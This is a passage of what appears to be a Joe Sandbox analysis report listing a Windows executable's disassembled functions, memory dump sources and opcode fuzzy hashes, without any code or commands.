                                                                                                                        • Source File: 00000000.00000002.1740404612.00007FF7A6731000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7A6730000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1740360080.00007FF7A6730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1740472247.00007FF7A675A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1740520704.00007FF7A676D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1740520704.00007FF7A677C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1740591717.00007FF7A677E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_7ff7a6730000_T1#U52a9#U624b1.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: e+000$gfff
                                                                                                                        • API String ID: 0-3030954782
                                                                                                                        • Opcode ID: e8ad3313ac50deca76865dcff50c63e8317fb702a62c77948e89599ff08dba86
                                                                                                                        • Instruction ID: 7688296034ee8e408d97b5ef96f80ba87d634c8ee1fb27d9fc5d142ea92b5d04
                                                                                                                        • Opcode Fuzzy Hash: e8ad3313ac50deca76865dcff50c63e8317fb702a62c77948e89599ff08dba86
                                                                                                                        • Instruction Fuzzy Hash: 03515722B292C546E724DA359C6C76AE791E748F94F8A8231CEA847AE5CE3DD440C710
                                                                                                                        Function 00007FF7A674FA08 Relevance: 2.0, APIs: 1, Instructions: 461COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1740404612.00007FF7A6731000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7A6730000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1740360080.00007FF7A6730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1740472247.00007FF7A675A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1740520704.00007FF7A676D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1740520704.00007FF7A677C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1740591717.00007FF7A677E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_7ff7a6730000_T1#U52a9#U624b1.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: CurrentFeaturePresentProcessProcessor
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1010374628-0
                                                                                                                        • Opcode ID: 3dd89506066c6ffdf0f12fb75a986cd17193a66726dd75fee6c51e450970bbea
                                                                                                                        • Instruction ID: 2deb480bb432770c85a426d440286471ec5f9810c2a1905a9a10a79eaf17dd24
                                                                                                                        • Opcode Fuzzy Hash: 3dd89506066c6ffdf0f12fb75a986cd17193a66726dd75fee6c51e450970bbea
                                                                                                                        • Instruction Fuzzy Hash: 49028F22A3B65241FA94BB219C7D27B9680AF8EF90FD64635DD5D473F2DE3CA4018720
                                                                                                                        Function 00007FF7A674CC04 Relevance: 1.5, Strings: 1, Instructions: 254COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1740404612.00007FF7A6731000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7A6730000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1740360080.00007FF7A6730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1740472247.00007FF7A675A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1740520704.00007FF7A676D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1740520704.00007FF7A677C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1740591717.00007FF7A677E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_7ff7a6730000_T1#U52a9#U624b1.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: gfffffff
                                                                                                                        • API String ID: 0-1523873471
                                                                                                                        • Opcode ID: 24567b7b7ad9cc25883cfe86a0af8cdb31fb8148e1153fa934f37376d4be2ae6
                                                                                                                        • Instruction ID: 33679422734efd0046ff3b07d304aa92731ab21b5f2d3e9a25c999551f947969
                                                                                                                        • Opcode Fuzzy Hash: 24567b7b7ad9cc25883cfe86a0af8cdb31fb8148e1153fa934f37376d4be2ae6
                                                                                                                        • Instruction Fuzzy Hash: 11A18963B2A7C586EB21DB2598687BABB90EB58FC4F428032DE4D477A5DE3DD401C710
                                                                                                                        Function 00007FF7A6746F98 Relevance: 1.4, Strings: 1, Instructions: 177COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1740404612.00007FF7A6731000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7A6730000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1740360080.00007FF7A6730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1740472247.00007FF7A675A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1740520704.00007FF7A676D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1740520704.00007FF7A677C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1740591717.00007FF7A677E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_7ff7a6730000_T1#U52a9#U624b1.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: _invalid_parameter_noinfo
                                                                                                                        • String ID: TMP
                                                                                                                        • API String ID: 3215553584-3125297090
                                                                                                                        • Opcode ID: 8bf532746fbfdd3304831ccd4c5a1a1816c9a4087bc6ecff30edaf665492098b
                                                                                                                        • Instruction ID: 0d73b268122486de374aaee2e3f8befa5308e7fc1063b47d270c4d67882d7b4d
                                                                                                                        • Opcode Fuzzy Hash: 8bf532746fbfdd3304831ccd4c5a1a1816c9a4087bc6ecff30edaf665492098b
                                                                                                                        • Instruction Fuzzy Hash: D5519E11B3B25241FA65BA265D3D5BBD290AF88FC4FCA8434DE0D477B6EE3DE4424260
                                                                                                                        Function 00007FF7A67525A0 Relevance: 1.3, APIs: 1, Instructions: 7memoryCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1740404612.00007FF7A6731000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7A6730000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1740360080.00007FF7A6730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1740472247.00007FF7A675A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1740520704.00007FF7A676D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1740520704.00007FF7A677C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1740591717.00007FF7A677E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_7ff7a6730000_T1#U52a9#U624b1.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: HeapProcess
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 54951025-0
                                                                                                                        • Opcode ID: 6aaf01db4fcd6d8e5e92a2165bcca8bef3bc9097c29bcaeff3790f5a52787e5b
                                                                                                                        • Instruction ID: fc1ab3849b7b704c701f5f5dc100f30cfa72994cacc7d3d515d7637b145be931
                                                                                                                        • Opcode Fuzzy Hash: 6aaf01db4fcd6d8e5e92a2165bcca8bef3bc9097c29bcaeff3790f5a52787e5b
                                                                                                                        • Instruction Fuzzy Hash: 74B09220E27A02C2EA08BB216C9221563B4BF4CB10FDA0078C10C50330DF2C20AA5B21
                                                                                                                        Function 00007FF7A6742800 Relevance: .3, Instructions: 327COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1740404612.00007FF7A6731000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7A6730000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1740360080.00007FF7A6730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1740472247.00007FF7A675A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1740520704.00007FF7A676D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1740520704.00007FF7A677C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1740591717.00007FF7A677E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_7ff7a6730000_T1#U52a9#U624b1.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 720b0f885fc535c3a242e303a59ba9c626026de2633fd245c18c7096fc28f432
                                                                                                                        • Instruction ID: 354e4056eabad43890123b219e49052f40687f837a7f32d78c0f9a7b54b01e72
                                                                                                                        • Opcode Fuzzy Hash: 720b0f885fc535c3a242e303a59ba9c626026de2633fd245c18c7096fc28f432
                                                                                                                        • Instruction Fuzzy Hash: 2DD1FB2AA2960281E768EE258C6C27FA350FF49F58F960135CD6D176B4DF39DC61C320
                                                                                                                        Function 00007FF7A67380A0 Relevance: .3, Instructions: 287COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1740404612.00007FF7A6731000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7A6730000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1740360080.00007FF7A6730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1740472247.00007FF7A675A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1740520704.00007FF7A676D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1740520704.00007FF7A677C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1740591717.00007FF7A677E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_7ff7a6730000_T1#U52a9#U624b1.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 25b4879d951165098d7d9ad8dfdbe188c5f26750c92d05a39af3c572e9b4c9ce
                                                                                                                        • Instruction ID: 99c4298ab0ad14c79d68c0a1a9be8d3d137660a4350264702db230feadffcea7
                                                                                                                        • Opcode Fuzzy Hash: 25b4879d951165098d7d9ad8dfdbe188c5f26750c92d05a39af3c572e9b4c9ce
                                                                                                                        • Instruction Fuzzy Hash: 30C183722241E04BE289EB29E96947EB791F78D30DBD5403BEB8747B89C73CA414D750
                                                                                                                        Function 00007FF7A6741E70 Relevance: .2, Instructions: 241COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1740404612.00007FF7A6731000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7A6730000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1740360080.00007FF7A6730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1740472247.00007FF7A675A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1740520704.00007FF7A676D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1740520704.00007FF7A677C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1740591717.00007FF7A677E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_7ff7a6730000_T1#U52a9#U624b1.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 3511ad376341763adbf03eaa1481790c1cd7a3e825f7d6c297581565e8b6740f
                                                                                                                        • Instruction ID: 51e856573fc2fd6cb60bf8a630f97cf5644504bb6b9271a17cc6cbb25350a0c9
                                                                                                                        • Opcode Fuzzy Hash: 3511ad376341763adbf03eaa1481790c1cd7a3e825f7d6c297581565e8b6740f
                                                                                                                        • Instruction Fuzzy Hash: B2B1BF7652A74585E764AF29C86C23EBBA0E749F48FA60135CB5E433B4CF3AD851C720
                                                                                                                        Function 00007FF7A674D718 Relevance: .2, Instructions: 198COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1740404612.00007FF7A6731000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7A6730000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1740360080.00007FF7A6730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1740472247.00007FF7A675A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1740520704.00007FF7A676D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1740520704.00007FF7A677C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1740591717.00007FF7A677E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_7ff7a6730000_T1#U52a9#U624b1.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: b482d32cf4439f597672c93949c919f143e2d798b80af63496daf47fa9f459cc
                                                                                                                        • Instruction ID: 2ff7055621fb8a8906cd0a8353c50605b57f9e174b0e4d9559c5eeab5cee243c
                                                                                                                        • Opcode Fuzzy Hash: b482d32cf4439f597672c93949c919f143e2d798b80af63496daf47fa9f459cc
                                                                                                                        • Instruction Fuzzy Hash: 95810472A2D78146EB74DB19986C37BE690FB89B94F814235DADD43BA5CF3DD4008B10
                                                                                                                        Function 00007FF7A6755820 Relevance: .2, Instructions: 183COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1740404612.00007FF7A6731000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7A6730000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1740360080.00007FF7A6730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1740472247.00007FF7A675A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1740520704.00007FF7A676D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1740520704.00007FF7A677C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1740591717.00007FF7A677E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_7ff7a6730000_T1#U52a9#U624b1.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: _invalid_parameter_noinfo
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3215553584-0
                                                                                                                        • Opcode ID: 093da9d804f6d3f0dcf011766d3ac1044083a14a82be884a6ec622c588f21297
                                                                                                                        • Instruction ID: 595d04aeb34519e772e92aeb86e17ee724ada48766c0692b28125992fc7b9f26
                                                                                                                        • Opcode Fuzzy Hash: 093da9d804f6d3f0dcf011766d3ac1044083a14a82be884a6ec622c588f21297
                                                                                                                        • Instruction Fuzzy Hash: 7E611C62E3E15245F725A528886433FE691BF48F70F970279D71E466F9DE3EE8008720
                                                                                                                        Function 00007FF7A6740FB4 Relevance: .1, Instructions: 146COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1740404612.00007FF7A6731000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7A6730000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1740360080.00007FF7A6730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1740472247.00007FF7A675A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1740520704.00007FF7A676D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1740520704.00007FF7A677C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1740591717.00007FF7A677E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_7ff7a6730000_T1#U52a9#U624b1.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: d861661aa08db629cc23cdca8c369b076586a2e450c00db1ba5d57a294e44a4f
                                                                                                                        • Instruction ID: be47699376d752ca80ef9ceda4346b4dda0c58dab98e4eb828143a8188aee79e
                                                                                                                        • Opcode Fuzzy Hash: d861661aa08db629cc23cdca8c369b076586a2e450c00db1ba5d57a294e44a4f
                                                                                                                        • Instruction Fuzzy Hash: 9751C836A7965182E724AB29C85C23A77A0EB5CF98F664131CE4D077B4CB3AEC53C750
                                                                                                                        Function 00007FF7A6740BA4 Relevance: .1, Instructions: 146COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1740404612.00007FF7A6731000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7A6730000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1740360080.00007FF7A6730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1740472247.00007FF7A675A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1740520704.00007FF7A676D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1740520704.00007FF7A677C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1740591717.00007FF7A677E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_7ff7a6730000_T1#U52a9#U624b1.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: c32b4ddfd43473a216dec7aa9a0be5b617892f75f4149cffacdc7470c95e978f
                                                                                                                        • Instruction ID: 3e969d7e5e82252626fabe3ad78cf2d12253717a627a0da5b697c76f05d1bcbb
                                                                                                                        • Opcode Fuzzy Hash: c32b4ddfd43473a216dec7aa9a0be5b617892f75f4149cffacdc7470c95e978f
                                                                                                                        • Instruction Fuzzy Hash: 7251B536A29651C6E7249F28C46C27A73A0EB4CF58F654235CE5D077B5CB3AE843C760
                                                                                                                        Function 00007FF7A67413C4 Relevance: .1, Instructions: 146COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1740404612.00007FF7A6731000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7A6730000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1740360080.00007FF7A6730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1740472247.00007FF7A675A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1740520704.00007FF7A676D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1740520704.00007FF7A677C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1740591717.00007FF7A677E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_7ff7a6730000_T1#U52a9#U624b1.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 867914ff4df0b6b44d704adc42bbe88cde9096fdc707783f05752eff833c7ffe
                                                                                                                        • Instruction ID: 1d00337b265161faab2704c835656fa7297e6e3d1d31cb213591e076eae17186
                                                                                                                        • Opcode Fuzzy Hash: 867914ff4df0b6b44d704adc42bbe88cde9096fdc707783f05752eff833c7ffe
                                                                                                                        • Instruction Fuzzy Hash: 35519836A6565182E764AB2DD46C27AB3A0EB4CF9CF664131CE4D077B4CB3AE843C750
                                                                                                                        Function 00007FF7A6740DB0 Relevance: .1, Instructions: 145COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1740404612.00007FF7A6731000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7A6730000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1740360080.00007FF7A6730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1740472247.00007FF7A675A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1740520704.00007FF7A676D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1740520704.00007FF7A677C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1740591717.00007FF7A677E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_7ff7a6730000_T1#U52a9#U624b1.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 1de1d42fcd570761cca71ddda72003ed022ec41b6526507f8e47f89f031e3167
                                                                                                                        • Instruction ID: e9ad7509a4ad231e972daaded52083d1a04b604aa9603deaf50086df25b72692
                                                                                                                        • Opcode Fuzzy Hash: 1de1d42fcd570761cca71ddda72003ed022ec41b6526507f8e47f89f031e3167
                                                                                                                        • Instruction Fuzzy Hash: 5551D93663666185E724AB28C46C23AB3A0EB4CF58F654135CE5C177B5CF3AE853CB50
                                                                                                                        Function 00007FF7A67409A0 Relevance: .1, Instructions: 145COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1740404612.00007FF7A6731000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7A6730000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1740360080.00007FF7A6730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1740472247.00007FF7A675A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1740520704.00007FF7A676D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1740520704.00007FF7A677C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1740591717.00007FF7A677E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_7ff7a6730000_T1#U52a9#U624b1.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 876697f8e8f5cbbdb44752562e3cb115d809b93d1bac5633a342ac63b65505f1
                                                                                                                        • Instruction ID: 83dfeef1cfdb50e5ba58a02977c4bcd87b57922448705376945305e4b0d95b3f
                                                                                                                        • Opcode Fuzzy Hash: 876697f8e8f5cbbdb44752562e3cb115d809b93d1bac5633a342ac63b65505f1
                                                                                                                        • Instruction Fuzzy Hash: 5A51B436B2965186E7249B28C86C23EA7A0EB48F58F664131CE5C177B4DF3AEC42C750
                                                                                                                        Function 00007FF7A67411C0 Relevance: .1, Instructions: 145COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1740404612.00007FF7A6731000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7A6730000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1740360080.00007FF7A6730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1740472247.00007FF7A675A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1740520704.00007FF7A676D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1740520704.00007FF7A677C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1740591717.00007FF7A677E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_7ff7a6730000_T1#U52a9#U624b1.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 6b4a4146db3bd1fe649265067838c8b0d7c1a5e97031d62dd0eb31e0fdd0228e
                                                                                                                        • Instruction ID: a73eb6179382dd8be0745e8821c152be934585d211c8be03371624bd275d1c21
                                                                                                                        • Opcode Fuzzy Hash: 6b4a4146db3bd1fe649265067838c8b0d7c1a5e97031d62dd0eb31e0fdd0228e
                                                                                                                        • Instruction Fuzzy Hash: CC51C832B6565186E764AB29C46C33D67A0EB49F58FA54131CE4C877B8CF3AE843C750
                                                                                                                        Function 00007FF7A6744F50 Relevance: .1, Instructions: 138COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1740404612.00007FF7A6731000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7A6730000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1740360080.00007FF7A6730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1740472247.00007FF7A675A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1740520704.00007FF7A676D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1740520704.00007FF7A677C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1740591717.00007FF7A677E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_7ff7a6730000_T1#U52a9#U624b1.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: dde3b7cfbcf26fc8d7513faefc9a59c4b8821272907dfbb35b6db6355186da00
                                                                                                                        • Instruction ID: 5058f14e9d89683dce613ae6d0fc43c046858892134bb5aaba835116f9897822
                                                                                                                        • Opcode Fuzzy Hash: dde3b7cfbcf26fc8d7513faefc9a59c4b8821272907dfbb35b6db6355186da00
                                                                                                                        • Instruction Fuzzy Hash: 3D414A46C3F65E44FA5099284C3C6B69680EF26FA4DEA52B0CE9B133F7CD0C6586C260
                                                                                                                        Function 00007FF7A6748BA0 Relevance: .1, Instructions: 126COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1740404612.00007FF7A6731000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7A6730000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1740360080.00007FF7A6730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1740472247.00007FF7A675A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1740520704.00007FF7A676D000.00000004.00000001.01000000.00000003.sdmpDownload File
